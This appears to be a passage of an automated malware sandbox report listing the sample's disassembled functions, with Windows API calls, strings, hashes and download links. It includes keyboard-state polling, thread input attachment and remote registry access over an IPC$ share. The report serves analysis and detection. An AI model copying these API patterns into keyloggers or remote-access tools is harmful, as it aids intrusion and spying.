                                                                      • DeleteObject.GDI32(00000000), ref: 00C769E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 6143e2a10d17f012ebe92821676ee71ac6d15b9258222bfb5f8ed1f433bb5e7e
                                                                      • Instruction ID: 06a65041483b4d27f76de5ece1c864988f8af3adcf188b41a68549134a245599
                                                                      • Opcode Fuzzy Hash: 6143e2a10d17f012ebe92821676ee71ac6d15b9258222bfb5f8ed1f433bb5e7e
                                                                      • Instruction Fuzzy Hash: BC61AF30511B00DFCB259F25E948B3977F1FB40322F189518F456A75A0CB75AE84DFA1
                                                                      Function 00C39838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39944: GetWindowLongW.USER32(?,000000EB), ref: 00C39952
                                                                      • GetSysColor.USER32(0000000F), ref: 00C39862
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 957aa97301b12fdf881485864e14a479992ef39060193df0a65684a787e207b1
                                                                      • Instruction ID: e37c5105d7cca0abd11901240d30f12bd4c862d9c108820122c9f02f8ea0eb66
                                                                      • Opcode Fuzzy Hash: 957aa97301b12fdf881485864e14a479992ef39060193df0a65684a787e207b1
                                                                      • Instruction Fuzzy Hash: 8741A031114644AFDB205F389C88BBE3BA5EB46330F144715F9B6972E1C7B19D41DB12
                                                                      Function 00C896E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00C6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C89717
                                                                      • LoadStringW.USER32(00000000,?,00C6F7F8,00000001), ref: 00C89720
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00C6F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C89742
                                                                      • LoadStringW.USER32(00000000,?,00C6F7F8,00000001), ref: 00C89745
                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C89866
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: 856986be38b5aae57b2e8f6a5d482a3a9d31d07cdc6171c1e4fc737653d62d3e
                                                                      • Instruction ID: 556b7384e936b6f72cb834a1eae9b461bcf8029a9d9a6f89ec8e00ebd938a355
                                                                      • Opcode Fuzzy Hash: 856986be38b5aae57b2e8f6a5d482a3a9d31d07cdc6171c1e4fc737653d62d3e
                                                                      • Instruction Fuzzy Hash: 56414C72800219ABCB04FBE0ED86EFEB778EF55344F140465F505720A2EA356F49EB61
                                                                      Function 00C806DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C807A2
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C807BE
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C807DA
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C80804
                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C8082C
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C80837
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C8083C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: 12409158685413d0b11645c3fccc111691f343c827af37d1e0ea7d70f38d7fcf
                                                                      • Instruction ID: 71ce4a8c52c4dbd3c3feeb69be66025c861a10ee9a6df28697453dd63d017c93
                                                                      • Opcode Fuzzy Hash: 12409158685413d0b11645c3fccc111691f343c827af37d1e0ea7d70f38d7fcf
                                                                      • Instruction Fuzzy Hash: 27411472C10229ABCF21EBA4EC859EDB778FF44354F144129E911A31A1EB309E48DBA0
                                                                      Function 00C97A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00C97AF3
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C97B8F
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00C97BA3
                                                                      • CoCreateInstance.OLE32(00CBFD08,00000000,00000001,00CE6E6C,?), ref: 00C97BEF
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C97C74
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00C97CCC
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00C97D57
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C97D7A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C97D81
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C97DD6
                                                                      • CoUninitialize.OLE32 ref: 00C97DDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: 678cf57fa7347ec965e4875b7c1f5662470189b7eea5279d942d5582e069bb56
                                                                      • Instruction ID: 935f9d019360dc34da580cee8a7b5db24336ee7e965d27b7cbc5a39aa464a14d
                                                                      • Opcode Fuzzy Hash: 678cf57fa7347ec965e4875b7c1f5662470189b7eea5279d942d5582e069bb56
                                                                      • Instruction Fuzzy Hash: 70C11A75A04119AFCB14DFA4C888DAEBBF9FF48304F1485A9F8199B661D731EE41CB90
                                                                      Function 00CB541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CB5504
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CB5515
                                                                      • CharNextW.USER32(00000158), ref: 00CB5544
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CB5585
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CB559B
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CB55AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: 171265ca075cd3ff81838647a61ae4bc57fa5fa72fa68f8ef04b49d3dbc60d1b
                                                                      • Instruction ID: a4e733e9c3d38d0fc243ba9b99321d6249b13efb6e2273f210fd43c4016db581
                                                                      • Opcode Fuzzy Hash: 171265ca075cd3ff81838647a61ae4bc57fa5fa72fa68f8ef04b49d3dbc60d1b
                                                                      • Instruction Fuzzy Hash: 7E616770900608AFDF209FA5CC84FFE7BB9EB09725F148145FA25AB290D7749A81DB61
                                                                      Function 00C7FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C7FAAF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00C7FB08
                                                                      • VariantInit.OLEAUT32(?), ref: 00C7FB1A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C7FB3A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C7FB8D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C7FBA1
                                                                      • VariantClear.OLEAUT32(?), ref: 00C7FBB6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00C7FBC3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C7FBCC
                                                                      • VariantClear.OLEAUT32(?), ref: 00C7FBDE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C7FBE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: 5ae40e189b7797e8a5bf7faa2e0e62ec0bf30e842aa3e60a02912952073b3c7d
                                                                      • Instruction ID: 312337c0c38e1d2f811c8888c907e5f9b38adaa46e94a5e74fdef1044b81bb56
                                                                      • Opcode Fuzzy Hash: 5ae40e189b7797e8a5bf7faa2e0e62ec0bf30e842aa3e60a02912952073b3c7d
                                                                      • Instruction Fuzzy Hash: D2414435900219DFCB00DF64D894ABDBBB9EF48354F008569E955A7251C730AA46DFA0
                                                                      Function 00C89C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C89CA1
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00C89D22
                                                                      • GetKeyState.USER32(000000A0), ref: 00C89D3D
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00C89D57
                                                                      • GetKeyState.USER32(000000A1), ref: 00C89D6C
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00C89D84
                                                                      • GetKeyState.USER32(00000011), ref: 00C89D96
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00C89DAE
                                                                      • GetKeyState.USER32(00000012), ref: 00C89DC0
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00C89DD8
                                                                      • GetKeyState.USER32(0000005B), ref: 00C89DEA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: 7092df86446bbb86b85acfe307340f79cc582dd0f7ae6e591ab70c55b6da5fde
                                                                      • Instruction ID: 291c42765231436366c020864988e30506c2471fd3fdafd3a56a5456cb35cbf4
                                                                      • Opcode Fuzzy Hash: 7092df86446bbb86b85acfe307340f79cc582dd0f7ae6e591ab70c55b6da5fde
                                                                      • Instruction Fuzzy Hash: 944195346047C96DFF31A664C8443B5BEA0EB1134CF0C805ADAD6565C2DBB59BC8C7AA
                                                                      Function 00C93388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C933CF
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C933F0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LoadString$_wcslen
                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                      • API String ID: 4099089115-3080491070
                                                                      • Opcode ID: 107a5d9e06dd9155cbde0f3ee56f97e04c54d41d63bffb4a5db8927f330e48a8
                                                                      • Instruction ID: 89d67aa84c3c43dcc2df64077b82a2787e0a6b38213b8788ccc70d1790d75720
                                                                      • Opcode Fuzzy Hash: 107a5d9e06dd9155cbde0f3ee56f97e04c54d41d63bffb4a5db8927f330e48a8
                                                                      • Instruction Fuzzy Hash: 86519A72900259ABDF15EBA0ED46EFEB778EF18340F144065F405720A2EB316F58EB61
                                                                      Function 00C8B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                      • API String ID: 1256254125-769500911
                                                                      • Opcode ID: 66cf86fe18b150adf535456a2b1eae32aa2e870aa48c26b0bfc4bf2fa93dfe03
                                                                      • Instruction ID: 89acb396111e1b9b9c59bfa175aae280de60c382b7ff9ffbeaf0a2d01db211f8
                                                                      • Opcode Fuzzy Hash: 66cf86fe18b150adf535456a2b1eae32aa2e870aa48c26b0bfc4bf2fa93dfe03
                                                                      • Instruction Fuzzy Hash: BB41A432A101279ACB247F7D88905BEB7A5BF60798B254129F435D7284F731CE81D794
                                                                      Function 00C95393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C953A0
                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C95416
                                                                      • GetLastError.KERNEL32 ref: 00C95420
                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00C954A7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                      • API String ID: 4194297153-14809454
                                                                      • Opcode ID: 4fd0c2a3a39839699bfc4ac1ac993afd859018c70e92410a550eb5ed20e70500
                                                                      • Instruction ID: 3e661bfd007ff7c9f8755df69ee057df30a2a4b36b83b806e0d3f26b0ef8558d
                                                                      • Opcode Fuzzy Hash: 4fd0c2a3a39839699bfc4ac1ac993afd859018c70e92410a550eb5ed20e70500
                                                                      • Instruction Fuzzy Hash: 7931D075A006049FCF52DF69C888BAEBBB4FF54305F148069E416DB292DB30DE82CB90
                                                                      Function 00C81EDF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00C81F64
                                                                      • GetDlgCtrlID.USER32 ref: 00C81F6F
                                                                      • GetParent.USER32 ref: 00C81F8B
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C81F8E
                                                                      • GetDlgCtrlID.USER32(?), ref: 00C81F97
                                                                      • GetParent.USER32(?), ref: 00C81FAB
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C81FAE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 711023334-1403004172
                                                                      • Opcode ID: cdc1018a31bfc63f8f81101f04e0116248d81d97ab725b9d203da1895610aee3
                                                                      • Instruction ID: 1e09d5854ecea650d9b6a9a6fddc23aacedfe39dde8737e192f9103c84a6a55c
                                                                      • Opcode Fuzzy Hash: cdc1018a31bfc63f8f81101f04e0116248d81d97ab725b9d203da1895610aee3
                                                                      • Instruction Fuzzy Hash: 7421C274E00214BBCF04AFA0DC85EEEBBB8EF09354F040215FA61672D1DB745905DB64
                                                                      Function 00C81FC0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00C82043
                                                                      • GetDlgCtrlID.USER32 ref: 00C8204E
                                                                      • GetParent.USER32 ref: 00C8206A
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C8206D
                                                                      • GetDlgCtrlID.USER32(?), ref: 00C82076
                                                                      • GetParent.USER32(?), ref: 00C8208A
                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C8208D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 711023334-1403004172
                                                                      • Opcode ID: 3375aaf28761420b6166f2946072f8ae4b46f285c3899ef99fdeb9cba47b50ea
                                                                      • Instruction ID: f414ccf583ffd6c59411584aaab69047b538de2754cb36ecceb01dcf867b6b18
                                                                      • Opcode Fuzzy Hash: 3375aaf28761420b6166f2946072f8ae4b46f285c3899ef99fdeb9cba47b50ea
                                                                      • Instruction Fuzzy Hash: 2421A1B5E00218BBCF10BFA0DC89FEEBBB8EF09344F004116B951A71A1DB755915EB64
                                                                      Function 00C8B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C8B151
                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B165
                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00C8B16C
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B17B
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C8B18D
                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B1A6
                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B1B8
                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B1FD
                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B212
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00C8A1E1,?,00000001), ref: 00C8B21D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
